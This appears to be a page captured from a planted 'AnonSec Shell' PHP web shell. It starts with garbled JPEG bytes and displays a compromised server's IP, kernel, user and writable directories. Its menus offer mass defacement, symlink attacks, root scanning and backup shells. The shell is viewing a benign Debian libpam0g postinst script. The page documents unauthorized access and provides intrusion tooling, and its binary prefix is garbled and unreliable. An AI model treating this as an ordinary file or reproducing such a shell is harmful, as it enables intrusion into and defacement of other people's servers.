JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 31.31.79.131  /  Your IP : 172.18.0.1   [ Reverse IP ]
Web Server : Apache/2.4.38 (Debian)
System : Linux a1822d00732a 4.15.0-39-generic #42-Ubuntu SMP Tue Oct 23 15:48:01 UTC 2018 x86_64
User : www-data ( 33)
PHP Version : 7.1.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/lib/dpkg/info/libpam0g:amd64.postinst
#!/bin/sh

# postinst based heavily on the postinst of libssl0.9.8, courtesy of 
# Christoph Martin.

. /usr/share/debconf/confmodule

set -e

# element() is a helper function for file-rc:
element() {
    local element list IFS

    element="$1"

    [ "$2" = "in" ] && shift
    list="$2"
    [ "$list" = "-" ] && return 1
    [ "$list" = "*" ] && return 0

    IFS=","
    set -- $list
    case $element in
	"$1"|"$2"|"$3"|"$4"|"$5"|"$6"|"$7"|"$8"|"$9")
	    return 0
    esac
    return 1
}

# filerc (runlevel, service) returns /etc/init.d/service, if service is
# running in $runlevel:
filerc() {
    local runlevel basename
    runlevel=$1
    basename=$2
    while read LINE
    do
	case $LINE in
	    \#*|"") continue
	esac

	set -- $LINE
	SORT_NO="$1"; STOP="$2"; START="$3"; CMD="$4"
	[ "$CMD" = "/etc/init.d/$basename" ] || continue

	if element "$runlevel" in "$START" || element "S" in "$START"
	then
	    echo "/etc/init.d/$basename"
	    return 0
	fi
    done < /etc/runlevel.conf
    echo ""
}

installed_services() {
    check="$@"

    # Only get the ones that are installed, and configured
    check=$(dpkg -s $check 2> /dev/null | egrep '^Package:|^Status:' | awk '{if ($1 ~ /^Package:/) { package=$2 } else if ($0 ~ /^Status: .* installed$/) { print package }}')

    # some init scripts don't match the package names
    check=$(echo $check | \
	sed -e's/\bapache2-common\b/apache2/g' \
	    -e's/\bat\b/atd/g' \
	    -e's/\bdovecot-common\b/dovecot/g' \
	    -e's/\bdante-server\b/danted/g' \
	    -e's/\bexim4-base\b/exim4/g' \
	    -e's/\bheartbeat-2\b/heartbeat/g' \
	    -e's/\bhylafax-server\b/hylafax/g' \
	    -e's/\bpartimage-server\b/partimaged/g' \
	    -e's/\bpostgresql-common\b/postgresql/g' \
	    -e's/\bsamba\b/smbd samba-ad-dc/g' \
	    -e's/\bsasl2-bin\b/saslauthd/g' \
    )

    for service in $check; do
	idl="/etc/init.d/${service}"
	if [ -n "$idl" ] && [ -x $idl ]; then
		services="$service $services"
	else
		echo "WARNING: init script for $service not found." >&2
	fi
    done
    echo "$services"
}

if [ "$1" = "configure" ]
then
    if [ ! -z "$2" ]; then
	if dpkg --compare-versions "$2" lt 1.3.1-2; then
	    db_version 2.0

	    echo -n "Checking for services that may need to be restarted..."

	    check="apache2-common at bayonne cherokee courier-authdaemon"
	    check="$check cron cups"
	    check="$check dante-server diald dovecot-common exim exim4-base"
	    check="$check fcron fireflier-server freeradius gdm heartbeat"
	    check="$check heartbeat-2 hylafax-server iiimf-server inn2"
	    check="$check kannel linesrv linesrv-mysql lsh-server"
	    check="$check muddleftpd netatalk nuauth partimage-server"
	    check="$check perdition pgpool popa3d"
	    check="$check postgresql-common proftpd pure-ftpd"
	    check="$check pure-ftpd-ldap pure-ftpd-mysql"
	    check="$check pure-ftpd-postgresql racoon samba sasl2-bin"
	    check="$check sfs-server solid-pop3d squid squid3 tac-plus"
	    check="$check vsftpd wu-ftpd wzdftpd xrdp yardradius yaws"

	    if [ -z "$(who | awk '$2 ~ /console/ && $NF ~ /:[0-9]/ { print $NF }
                                  $2 ~ /:[0-9]/ { print $2 }')" ]
	    then
		check="$check wdm xdm"
	    fi

	    echo "Checking init scripts..."
	    services=$(installed_services "$check")
	    if [ -n "$services" ]; then
		db_input critical libraries/restart-without-asking || true
		db_go || true
		db_get libraries/restart-without-asking
		if [ "$RET" != true ]; then
		    db_reset libpam0g/restart-services
		    db_set libpam0g/restart-services "$services"
		    db_input critical libpam0g/restart-services || true
		    db_go || true
		    db_get libpam0g/restart-services

		    if [ "x$RET" != "x" ]
		    then
			services=$RET
		    else
			services=""
		    fi
		fi
		echo
		if [ "$services" != "" ]; then
		    echo "Restarting services possibly affected by the upgrade:"
		    failed=""
		    rl=$(runlevel | sed 's/.*\ //')
		    for service in $services; do
			idl="invoke-rc.d ${service}"

			case "$service" in
			    gdm)
				echo -n "  $service: reloading..."
				if $idl reload > /dev/null 2>&1; then
				    echo "done."
				else
				    echo "FAILED! ($?)"
				    failed="$service $failed"
				fi
				continue
			    ;;
			esac
			echo -n "  $service: stopping..."
			$idl stop > /dev/null 2>&1 || true
			sleep 1
			echo -n "starting..."
			if $idl start > /dev/null 2>&1; then
			    echo "done."
			else
			    echo "FAILED! ($?)"
			    failed="$service $failed"
			fi
		    done
		    echo
		    if [ -n "$failed" ]; then
			db_subst libpam0g/restart-failed services "$failed"
			db_input critical libpam0g/restart-failed || true
			db_go || true
		    else
			echo "Services restarted successfully."
		    fi
		    echo
		fi
	    else
		echo "Nothing to restart."
	    fi

	    if [ -n "$(who | awk '$2 ~ /console/ && $NF ~ /:[0-9]/ { print $NF }
                                  $2 ~ /:[0-9]/ { print $2 }')" ]
	    then
		dms=""
		for service in wdm xdm; do
		    case "$services" in
			*$service*)	;;
			*)	dms="$dms $service"
		    esac
		done
		services=$(installed_services "$dms")
		if [ -n "$services" ]; then
		    db_input critical libpam0g/xdm-needs-restart || true
		    db_go || true
		fi
	    fi

	    # Shut down the frontend, to make sure none of the
	    # restarted services keep a connection open to it
	    db_stop
	fi # end upgrading and $2 lt 1.3.1-2
    fi # Upgrading
fi




Anon7 - 2022
AnonSec Team